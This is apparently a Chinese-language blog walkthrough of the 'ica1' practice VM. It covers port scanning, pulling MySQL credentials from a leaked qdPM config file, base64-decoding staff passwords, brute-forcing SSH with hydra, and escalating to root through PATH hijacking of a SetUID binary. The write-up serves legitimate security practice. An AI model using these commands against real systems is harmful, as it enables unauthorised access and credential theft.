ica1靶机练习

使用vb打开虚拟机,选择桥接模式,kali也选择桥接

开机后会出现靶机ip,ip会时不时的变,命令不行,记得看一下ip是否变了

先扫描一下开放了哪些端口

nmap -p- 172.16.2.41

访问80后发现是个登录页面

是一个框架系统,版本为9.2

在kali中搜索看看这个框架有没有漏洞

要登录的话,我们查看第二个漏洞,密码相关

下载查看

翻译

我们到这个网址查看,下载文件

curl http://ip/core/config/databases.yml

给出了mysql的账号和密码,前面也看到开放的端口有3306,也就是mysql服务启动了

尝试进入数据库 正常登录会提示证书不符,后面加一句跳过

mysql -h 172.16.2.47 -u qdpmadmin -p --skip-ssl

在staff中,找到了用户名密码

密码是经过加密的,我们去base64解密

c3VSSkFkR3dMcDhkeTNyRg==

N1p3VjRxdGc0MmNtVVhHWA==

WDdNUWtQM1cyOWZld0hkQw==

REpjZVZ5OThXMjhZN3dMZw==

Y3FObkJXQ0J5UzJEdUpTeQ==

suRJAdGwLp8dy3rF

7ZwV4qtg42cmUXGX

X7MQkP3W29fewHdC

DJceVy98W28Y7wLg

cqNnBWCByS2DuJSy
Smith

ucas

Travis

Dexter

Meyer

使用hydry爆破一下,先写两个文件user和passwd作为字典

hydra -L user -P pass ssh://172.16.2.54

22ssh host: 172.16.2.54 login: travis password: DJceVy98W28Y7wLg

22ssh host: 172.16.2.54 login: dexter password: 7ZwV4qtg42cmUXGX

登录一下

ssh travis@172.16.2.54

ssh dexter@172.16.2.54

查看具有SetUID权限的可执行的文件

find / -perm -4000 2>/dev/null

使用strings命令查看一下get_access

发现cat命令提权

配置环境变量

echo "/bin/bash" > /tmp/cat

export PATH=/tmp:$PATH

chmod +x /tmp/cat

ehco $PATH

/opt/get_access

相关推荐
Lsetea6 小时前
curl指定CA目录仍报证书不受信任:--capath与OpenSSL rehash排查
运维·https·ssl·openssl·curl
夜听莺儿鸣6 小时前
502-002_Linux驱动开发模块化编程
linux·驱动开发·模块化编程
wuminyu7 小时前
C++协程实现接收端的零拷贝Buffer管理原理剖析
java·linux·c语言·jvm·c++
优化Henry7 小时前
LTE 载波频率与频点配置详解
运维·网络·学习·5g·信息与通信
代码方舟7 小时前
数据科学风控实战:基于天远全能消金报告构建自动化信用评估网关
运维·人工智能·自动化
科力锐品牌君7 小时前
应用级灾备 | 海量非结构化数据如何实现高效数据保护
linux·运维·网络·安全·系统安全·数据安全·灾备
KaiwuDB7 小时前
KaiwuDB 运维实战04:DRBD + KaiwuDB——物联网场景下的低成本数据库高可用方案
运维·数据库·物联网·时序数据库·kaiwudb·aiot·多模数据库
zhangrelay7 小时前
ROS项目设计案例智能大模型正经乱答案例
linux·笔记·学习·ubuntu·机器人
福建佰胜张工8 小时前
A5E00839230西门子工业核心配件详解:参数、安装调试与故障运维全攻略
运维·网络·安全·自动化
流浪0018 小时前
Linux系统篇39——线程(四) pthread库的由来和线程的创建与等待
linux·操作系统·线程·pthread库